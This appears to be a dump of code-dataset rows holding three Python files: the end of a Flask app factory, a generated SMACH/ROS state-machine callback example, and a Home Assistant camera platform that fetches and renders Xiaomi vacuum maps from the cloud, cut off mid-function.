app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
app.app_context().push()
from .models import User
weGood = True
try:
userCount = db.session.query(User).count()
if userCount == 0:
weGood = seed_db(db, app.logger)
except OperationalError:
# No DB setup. Create it:
db.create_all()
weGood = seed_db(db, app.logger)
if not weGood:
app.logger.error("Exiting because of DB issue")
sys.exit(3)
login_manager = LoginManager()
login_manager.login_view = 'auth.login'
login_manager.init_app(app)
@login_manager.user_loader
def load_user(user_id):
# since the user_id is just the primary key of our user table, use it in the query for the user
return User.query.get(int(user_id))
# blueprint for auth routes in our app
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint)
# blueprint for non-auth parts of app
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
return app | 34.014085 | 144 | 0.677019 |
c6b6e82caa9ed5eb1f641c56e61322509773328a | 14,216 | py | Python | smacha_ros/test/smacha_generated_py/smacha_test_examples/callbacks_generate_output.py | ReconCell/smacha | 253215a35d2d091bf50c28c1ba876209b82d2400 | [
"BSD-3-Clause"
] | 16 | 2019-04-16T07:44:30.000Z | 2022-03-10T08:04:45.000Z | smacha_ros/test/smacha_generated_py/smacha_test_examples/callbacks_generate_output.py | ReconCell/smacha | 253215a35d2d091bf50c28c1ba876209b82d2400 | [
"BSD-3-Clause"
] | 2 | 2019-07-18T09:11:00.000Z | 2019-09-26T10:21:26.000Z | smacha_ros/test/smacha_generated_py/smacha_test_examples/callbacks_generate_output.py | ReconCell/smacha | 253215a35d2d091bf50c28c1ba876209b82d2400 | [
"BSD-3-Clause"
] | 2 | 2019-08-21T20:14:54.000Z | 2019-09-19T13:26:34.000Z | #!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
import random
# Define normal callback for 'animals' output key
@smach.cb_interface(input_keys=['animals'],
output_keys=['animals'],
outcomes=['succeeded'])
def foo_animals_cb(userdata):
userdata['animals'].append('turtles')
return 'succeeded'
# Define normal callback for 'numbers' output key
@smach.cb_interface(input_keys=['numbers'],
output_keys=['numbers'],
outcomes=['succeeded'])
def foo_numbers_cb(userdata):
userdata['numbers'].append(userdata['numbers'][-1]+1)
return 'succeeded'
class Foo(smach.State):
def __init__(self, name, input_keys=[], output_keys=[], callbacks=[]):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded'])
self._name = name
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def execute(self, userdata):
for input_key in self._input_keys:
rospy.loginfo('Userdata input key \'{}\' BEFORE callback execution: {}'.format(input_key, userdata[input_key]))
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
for input_key in self._input_keys:
rospy.loginfo('Userdata input key \'{}\' AFTER callback execution: {}'.format(input_key, userdata[input_key]))
return 'succeeded'
class CallbacksState(smach.State):
def __init__(self, input_keys=[], output_keys=[], callbacks=[]):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded'])
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
return 'succeeded'
@smach.cb_interface(input_keys=['animals'],
output_keys=['animals'],
outcomes=[])
def animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.animals if ud.animals.append('ducks') else ud.animals
userdata.animals = lambda_cb(userdata)
return 'succeeded'
CallbacksState.animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb = animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb
@smach.cb_interface(input_keys=['numbers'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.numbers[-1]+1) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
CallbacksState.numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb = numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb
@smach.cb_interface(input_keys=['animals', 'numbers'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.numbers[-1]+1) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb = numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb
@smach.cb_interface(input_keys=['animals', 'numbers'],
output_keys=['animals'],
outcomes=[])
def animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.animals if ud.animals.append('ducks') else ud.animals
userdata.animals = lambda_cb(userdata)
return 'succeeded'
Foo.animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb = animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb
@smach.cb_interface(input_keys=[],
output_keys=['random_number'],
outcomes=[])
def random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb(self, userdata):
lambda_cb = lambda ud: random.random()
userdata.random_number = lambda_cb(userdata)
return 'succeeded'
CallbacksState.random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb = random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'random_number'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.random_number) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb = numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'number'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.number) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb = numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['a_random_number_1'],
outcomes=[])
def a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: random.random()
userdata.a_random_number_1 = lambda_cb(userdata)
return 'succeeded'
Foo.a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['a_random_number_2'],
outcomes=[])
def a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: random.random()
userdata.a_random_number_2 = lambda_cb(userdata)
return 'succeeded'
Foo.a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['b_random_number_sum'],
outcomes=[])
def b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.a_random_number_1 + ud.a_random_number_2
userdata.b_random_number_sum = lambda_cb(userdata)
return 'succeeded'
Foo.b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(ud.b_random_number_sum) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
Foo.numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb = numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb
@smach.cb_interface(input_keys=['numbers'],
output_keys=['numbers'],
outcomes=[])
def numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.numbers if ud.numbers.append(42) else ud.numbers
userdata.numbers = lambda_cb(userdata)
return 'succeeded'
CallbacksState.numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb = numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb
def main():
rospy.init_node('sm')
sm = smach.StateMachine(outcomes=['final_outcome'])
sm.userdata.animals = ['cats', 'dogs', 'sharks']
sm.userdata.numbers = [1, 2, 3]
sm.userdata.number = 123
sm.userdata.a_random_number_1 = 0
sm.userdata.a_random_number_2 = 0
sm.userdata.b_random_number_sum = 0
with sm:
smach.StateMachine.add('FOO_0', Foo('FOO_0', input_keys = ['animals'], output_keys = ['animals'], callbacks = ['foo_animals_cb']),
transitions={'succeeded':'FOO_1'})
smach.StateMachine.add('FOO_1',
CallbacksState(input_keys = ['animals'], output_keys = ['animals'], callbacks = ['animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb']),
transitions={'succeeded':'FOO_2'})
smach.StateMachine.add('FOO_2', Foo('FOO_2', input_keys = ['numbers'], output_keys = ['numbers'], callbacks = ['foo_numbers_cb']),
transitions={'succeeded':'FOO_3'})
smach.StateMachine.add('FOO_3',
CallbacksState(input_keys = ['numbers'], output_keys = ['numbers'], callbacks = ['numbers_foo_3_2a53ff4f77e944a19f6ab20aee410018_lambda_cb']),
transitions={'succeeded':'FOO_4'})
smach.StateMachine.add('FOO_4', Foo('FOO_4', input_keys = ['animals', 'numbers'], output_keys = ['animals', 'numbers'], callbacks = ['foo_animals_cb', 'numbers_foo_4_af4598a282214cdf80a439b7ae78b938_lambda_cb']),
transitions={'succeeded':'FOO_5'})
smach.StateMachine.add('FOO_5', Foo('FOO_5', input_keys = ['animals', 'numbers'], output_keys = ['animals', 'numbers'], callbacks = ['animals_foo_5_9dabdb0983a74adaa235960ae2de925d_lambda_cb', 'foo_numbers_cb']),
transitions={'succeeded':'FOO_6'})
smach.StateMachine.add('FOO_6',
CallbacksState(output_keys = ['random_number'], callbacks = ['random_number_foo_6_b31f110e85aa43769f49be431dd11b70_lambda_cb']),
transitions={'succeeded':'FOO_7'})
smach.StateMachine.add('FOO_7', Foo('FOO_7', input_keys = ['numbers', 'random_number'], output_keys = ['numbers'], callbacks = ['numbers_foo_7_865fc1d586324640a3b518c338d1bbfb_lambda_cb']),
transitions={'succeeded':'FOO_8'})
smach.StateMachine.add('FOO_8', Foo('FOO_8', input_keys = ['numbers', 'number'], output_keys = ['numbers'], callbacks = ['numbers_foo_8_5ea2b7ba048e4b28ab47c263cb43fdb4_lambda_cb']),
transitions={'succeeded':'FOO_9'})
smach.StateMachine.add('FOO_9', Foo('FOO_9', input_keys = ['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'], output_keys = ['numbers', 'a_random_number_1', 'a_random_number_2', 'b_random_number_sum'], callbacks = ['a_random_number_1_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb', 'a_random_number_2_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb', 'b_random_number_sum_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb', 'numbers_foo_9_7e4365c6b46c47f4916169d8afa64082_lambda_cb']),
transitions={'succeeded':'FOO_10'})
smach.StateMachine.add('FOO_10',
CallbacksState(input_keys = ['numbers'], output_keys = ['numbers'], callbacks = ['numbers_foo_10_d828838101464c8bae7096f810eb063f_lambda_cb']),
transitions={'succeeded':'final_outcome'})
outcome = sm.execute()
if __name__ == '__main__':
main() | 38.630435 | 523 | 0.666854 |
45301fac1df819682e52e185eb6f20f12faaa569 | 18,899 | py | Python | custom_components/xiaomi_cloud_map_extractor/camera.py | dmr1987/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor | a1a636db9e3bba2479c3760ec70a3b07dc996e02 | [
"MIT"
] | null | null | null | custom_components/xiaomi_cloud_map_extractor/camera.py | dmr1987/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor | a1a636db9e3bba2479c3760ec70a3b07dc996e02 | [
"MIT"
] | null | null | null | custom_components/xiaomi_cloud_map_extractor/camera.py | dmr1987/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor | a1a636db9e3bba2479c3760ec70a3b07dc996e02 | [
"MIT"
] | null | null | null | import io
import logging
import time
from datetime import timedelta
from enum import Enum
from typing import Optional
try:
from miio import RoborockVacuum, DeviceException
except ImportError:
from miio import Vacuum as RoborockVacuum, DeviceException
import PIL.Image as Image
import voluptuous as vol
from homeassistant.components.camera import Camera, ENTITY_ID_FORMAT, PLATFORM_SCHEMA, SUPPORT_ON_OFF
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from custom_components.xiaomi_cloud_map_extractor.common.map_data_parser import MapDataParser
from custom_components.xiaomi_cloud_map_extractor.common.xiaomi_cloud_connector import XiaomiCloudConnector
from custom_components.xiaomi_cloud_map_extractor.const import *
from custom_components.xiaomi_cloud_map_extractor.dreame.vacuum import DreameVacuum
from custom_components.xiaomi_cloud_map_extractor.roidmi.vacuum import RoidmiVacuum
from custom_components.xiaomi_cloud_map_extractor.viomi.vacuum import ViomiVacuum
from custom_components.xiaomi_cloud_map_extractor.xiaomi.vacuum import XiaomiVacuum
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=5)
DEFAULT_TRIMS = {
CONF_LEFT: 0,
CONF_RIGHT: 0,
CONF_TOP: 0,
CONF_BOTTOM: 0
}
DEFAULT_SIZES = {
CONF_SIZE_VACUUM_RADIUS: 4,
CONF_SIZE_IGNORED_OBSTACLE_RADIUS: 3,
CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_OBSTACLE_RADIUS: 3,
CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_CHARGER_RADIUS: 4
}
COLOR_SCHEMA = vol.Or(
vol.All(vol.Length(min=3, max=3), vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.All(vol.Length(min=4, max=4), vol.ExactSequence((cv.byte, cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple))
)
PERCENT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
POSITIVE_FLOAT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0))
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_COUNTRY, default=None): vol.Or(vol.In(CONF_AVAILABLE_COUNTRIES), vol.Equal(None)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_AUTO_UPDATE, default=True): cv.boolean,
vol.Optional(CONF_COLORS, default={}): vol.Schema({
vol.In(CONF_AVAILABLE_COLORS): COLOR_SCHEMA
}),
vol.Optional(CONF_ROOM_COLORS, default={}): vol.Schema({
cv.positive_int: COLOR_SCHEMA
}),
vol.Optional(CONF_DRAW, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_DRAWABLES)]),
vol.Optional(CONF_MAP_TRANSFORM, default={CONF_SCALE: 1, CONF_ROTATE: 0, CONF_TRIM: DEFAULT_TRIMS}):
vol.Schema({
vol.Optional(CONF_SCALE, default=1): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_ROTATE, default=0): vol.In([0, 90, 180, 270]),
vol.Optional(CONF_TRIM, default=DEFAULT_TRIMS): vol.Schema({
vol.Optional(CONF_LEFT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_RIGHT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_TOP, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_BOTTOM, default=0): PERCENT_SCHEMA
}),
}),
vol.Optional(CONF_ATTRIBUTES, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_ATTRIBUTES)]),
vol.Optional(CONF_TEXTS, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TEXT): cv.string,
vol.Required(CONF_X): vol.Coerce(float),
vol.Required(CONF_Y): vol.Coerce(float),
vol.Optional(CONF_COLOR, default=(0, 0, 0)): COLOR_SCHEMA,
vol.Optional(CONF_FONT, default=None): vol.Or(cv.string, vol.Equal(None)),
vol.Optional(CONF_FONT_SIZE, default=0): cv.positive_int
})]),
vol.Optional(CONF_SIZES, default=DEFAULT_SIZES): vol.Schema({
vol.Optional(CONF_SIZE_VACUUM_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_VACUUM_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_CHARGER_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_CHARGER_RADIUS]): POSITIVE_FLOAT_SCHEMA
}),
vol.Optional(CONF_STORE_MAP_RAW, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_IMAGE, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_PATH, default="/tmp"): cv.string,
vol.Optional(CONF_BG_IMAGE_USE, default=False): cv.boolean,
vol.Optional(CONF_BG_IMAGE_PATH, default="/config/www/map_tmp.png"): cv.string,
vol.Optional(CONF_BG_IMAGE_ALPHA, default=50): cv.byte,
vol.Optional(CONF_FORCE_API, default=None): vol.Or(vol.In(CONF_AVAILABLE_APIS), vol.Equal(None))
})
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
host = config[CONF_HOST]
token = config[CONF_TOKEN]
username = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
country = config[CONF_COUNTRY]
name = config[CONF_NAME]
should_poll = config[CONF_AUTO_UPDATE]
image_config = config[CONF_MAP_TRANSFORM]
colors = config[CONF_COLORS]
room_colors = config[CONF_ROOM_COLORS]
for room, color in room_colors.items():
colors[f"{COLOR_ROOM_PREFIX}{room}"] = color
drawables = config[CONF_DRAW]
sizes = config[CONF_SIZES]
texts = config[CONF_TEXTS]
if DRAWABLE_ALL in drawables:
drawables = CONF_AVAILABLE_DRAWABLES[1:]
attributes = config[CONF_ATTRIBUTES]
store_map_raw = config[CONF_STORE_MAP_RAW]
store_map_image = config[CONF_STORE_MAP_IMAGE]
store_map_path = config[CONF_STORE_MAP_PATH]
bg_image_use = config[CONF_BG_IMAGE_USE]
bg_image_path = config[CONF_BG_IMAGE_PATH]
bg_image_alpha = config[CONF_BG_IMAGE_ALPHA]
force_api = config[CONF_FORCE_API]
entity_id = generate_entity_id(ENTITY_ID_FORMAT, name, hass=hass)
async_add_entities([VacuumCamera(entity_id, host, token, username, password, country, name, should_poll,
image_config, colors, drawables, sizes, texts, attributes, store_map_raw,
store_map_image, store_map_path, force_api,
bg_image_use,bg_image_path,bg_image_alpha)])
class VacuumCamera(Camera):
def __init__(self, entity_id, host, token, username, password, country, name, should_poll, image_config, colors,
drawables, sizes, texts, attributes, store_map_raw, store_map_image, store_map_path, force_api,
bg_image_use,bg_image_path,bg_image_alpha):
super().__init__()
self.entity_id = entity_id
self.content_type = CONTENT_TYPE
self._vacuum = RoborockVacuum(host, token)
self._connector = XiaomiCloudConnector(username, password)
self._status = CameraStatus.INITIALIZING
self._device = None
self._name = name
self._should_poll = should_poll
self._image_config = image_config
self._colors = colors
self._drawables = drawables
self._sizes = sizes
self._texts = texts
self._attributes = attributes
self._store_map_raw = store_map_raw
self._store_map_image = store_map_image
self._store_map_path = store_map_path
self._forced_api = force_api
self._used_api = None
self._map_saved = None
self._image = None
self._map_data = None
self._logged_in = False
self._logged_in_previously = True
self._received_map_name_previously = True
self._country = country
self._bg_image_use = bg_image_use
self._bg_image_path = bg_image_path
self._bg_image_alpha = bg_image_alpha
async def async_added_to_hass(self) -> None:
self.async_schedule_update_ha_state(True)
@property
def frame_interval(self):
return 1
def camera_image(self, width: Optional[int] = None, height: Optional[int] = None) -> Optional[bytes]:
return self._image
@property
def name(self):
return self._name
def turn_on(self):
self._should_poll = True
def turn_off(self):
self._should_poll = False
@property
def supported_features(self):
return SUPPORT_ON_OFF
@property
def extra_state_attributes(self):
attributes = {}
if self._map_data is not None:
rooms = []
if self._map_data.rooms is not None:
rooms = dict(
filter(lambda x: x[0] is not None, map(lambda x: (x[0], x[1].name), self._map_data.rooms.items())))
if len(rooms) == 0:
rooms = list(self._map_data.rooms.keys())
for name, value in {
ATTRIBUTE_CALIBRATION: self._map_data.calibration(),
ATTRIBUTE_CHARGER: self._map_data.charger,
ATTRIBUTE_CLEANED_ROOMS: self._map_data.cleaned_rooms,
ATTRIBUTE_COUNTRY: self._country,
ATTRIBUTE_GOTO: self._map_data.goto,
ATTRIBUTE_GOTO_PATH: self._map_data.goto_path,
ATTRIBUTE_GOTO_PREDICTED_PATH: self._map_data.predicted_path,
ATTRIBUTE_IGNORED_OBSTACLES: self._map_data.ignored_obstacles,
ATTRIBUTE_IGNORED_OBSTACLES_WITH_PHOTO: self._map_data.ignored_obstacles_with_photo,
ATTRIBUTE_IMAGE: self._map_data.image,
ATTRIBUTE_IS_EMPTY: self._map_data.image.is_empty,
ATTRIBUTE_MAP_NAME: self._map_data.map_name,
ATTRIBUTE_NO_GO_AREAS: self._map_data.no_go_areas,
ATTRIBUTE_NO_MOPPING_AREAS: self._map_data.no_mopping_areas,
ATTRIBUTE_OBSTACLES: self._map_data.obstacles,
ATTRIBUTE_OBSTACLES_WITH_PHOTO: self._map_data.obstacles_with_photo,
ATTRIBUTE_PATH: self._map_data.path,
ATTRIBUTE_ROOM_NUMBERS: rooms,
ATTRIBUTE_ROOMS: self._map_data.rooms,
ATTRIBUTE_VACUUM_POSITION: self._map_data.vacuum_position,
ATTRIBUTE_VACUUM_ROOM: self._map_data.vacuum_room,
ATTRIBUTE_VACUUM_ROOM_NAME: self._map_data.vacuum_room_name,
ATTRIBUTE_WALLS: self._map_data.walls,
ATTRIBUTE_ZONES: self._map_data.zones
}.items():
if name in self._attributes:
attributes[name] = value
if self._store_map_raw:
attributes[ATTRIBUTE_MAP_SAVED] = self._map_saved
if self._device is not None:
attributes[ATTR_MODEL] = self._device.model
attributes[ATTR_USED_API] = self._used_api
return attributes
@property
def should_poll(self):
return self._should_poll
def update(self):
counter = 10
if self._status != CameraStatus.TWO_FACTOR_AUTH_REQUIRED and not self._logged_in:
self._handle_login()
if self._device is None and self._logged_in:
self._handle_device()
map_name = self._handle_map_name(counter)
if map_name == "retry" and self._device is not None:
self._status = CameraStatus.FAILED_TO_RETRIEVE_MAP_FROM_VACUUM
self._received_map_name_previously = map_name != "retry"
if self._logged_in and map_name != "retry" and self._device is not None:
self._handle_map_data(map_name)
else:
_LOGGER.debug("Unable to retrieve map, reasons: Logged in - %s, map name - %s, device retrieved - %s",
self._logged_in, map_name, self._device is not None)
self._set_map_data(MapDataParser.create_empty(self._colors, str(self._status)))
self._logged_in_previously = self._logged_in
def _handle_login(self):
_LOGGER.debug("Logging in...")
self._logged_in = self._connector.login()
if self._logged_in is None:
_LOGGER.debug("2FA required")
self._status = CameraStatus.TWO_FACTOR_AUTH_REQUIRED
elif self._logged_in:
_LOGGER.debug("Logged in")
self._status = CameraStatus.LOGGED_IN
else:
_LOGGER.debug("Failed to log in")
self._status = CameraStatus.FAILED_LOGIN
if self._logged_in_previously:
_LOGGER.error("Unable to log in, check credentials")
def _handle_device(self):
_LOGGER.debug("Retrieving device info, country: %s", self._country)
country, user_id, device_id, model = self._connector.get_device_details(self._vacuum.token, self._country)
if model is not None:
self._country = country
_LOGGER.debug("Retrieved device model: %s", model)
self._device = self._create_device(user_id, device_id, model)
_LOGGER.debug("Created device, used api: %s", self._used_api)
else:
_LOGGER.error("Failed to retrieve model")
self._status = CameraStatus.FAILED_TO_RETRIEVE_DEVICE
def _handle_map_name(self, counter):
map_name = "retry"
if self._device is not None and not self._device.should_get_map_from_vacuum():
map_name = "0"
while map_name == "retry" and counter > 0:
_LOGGER.debug("Retrieving map name from device")
time.sleep(0.1)
try:
map_name = self._vacuum.map()[0]
_LOGGER.debug("Map name %s", map_name)
except OSError as exc:
_LOGGER.error("Got OSError while fetching the state: %s", exc)
except DeviceException as exc:
if self._received_map_name_previously:
_LOGGER.warning("Got exception while fetching the state: %s", exc)
self._received_map_name_previously = False
finally:
counter = counter - 1
return map_name
def _handle_map_data(self, map_name):
_LOGGER.debug("Retrieving map from Xiaomi cloud")
store_map_path = self._store_map_path if self._store_map_raw else None
map_data, map_stored = self._device.get_map(map_name, self._colors, self._drawables, self._texts,
self._sizes, self._image_config, store_map_path,
self._bg_image_use, self._bg_image_path, self._bg_image_alpha)
if map_data is not None:
# noinspection PyBroadException
try:
_LOGGER.debug("Map data retrieved")
self._set_map_data(map_data)
self._map_saved = map_stored
if self._map_data.image.is_empty:
_LOGGER.debug("Map is empty")
self._status = CameraStatus.EMPTY_MAP
else:
_LOGGER.debug("Map is ok")
self._status = CameraStatus.OK
except:
_LOGGER.warning("Unable to parse map data")
self._status = CameraStatus.UNABLE_TO_PARSE_MAP
else:
self._logged_in = False
_LOGGER.warning("Unable to retrieve map data")
self._status = CameraStatus.UNABLE_TO_RETRIEVE_MAP
def _set_map_data(self, map_data):
img_byte_arr = io.BytesIO()
map_data.image.data.save(img_byte_arr, format='PNG')
self._image = img_byte_arr.getvalue()
self._map_data = map_data
self._store_image()
def _create_device(self, user_id, device_id, model):
self._used_api = self._detect_api(model)
if self._used_api == CONF_AVAILABLE_API_XIAOMI:
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_VIOMI:
return ViomiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_ROIDMI:
return RoidmiVacuum(self._connector, self._country, user_id, device_id, model)
if self._used_api == CONF_AVAILABLE_API_DREAME:
return DreameVacuum(self._connector, self._country, user_id, device_id, model)
return XiaomiVacuum(self._connector, self._country, user_id, device_id, model)
def _detect_api(self, model: str):
if self._forced_api is not None:
return self._forced_api
if model in API_EXCEPTIONS:
return API_EXCEPTIONS[model]
def list_contains_model(prefixes):
return len(list(filter(lambda x: model.startswith(x), prefixes))) > 0
filtered = list(filter(lambda x: list_contains_model(x[1]), AVAILABLE_APIS.items()))
if len(filtered) > 0:
return filtered[0][0]
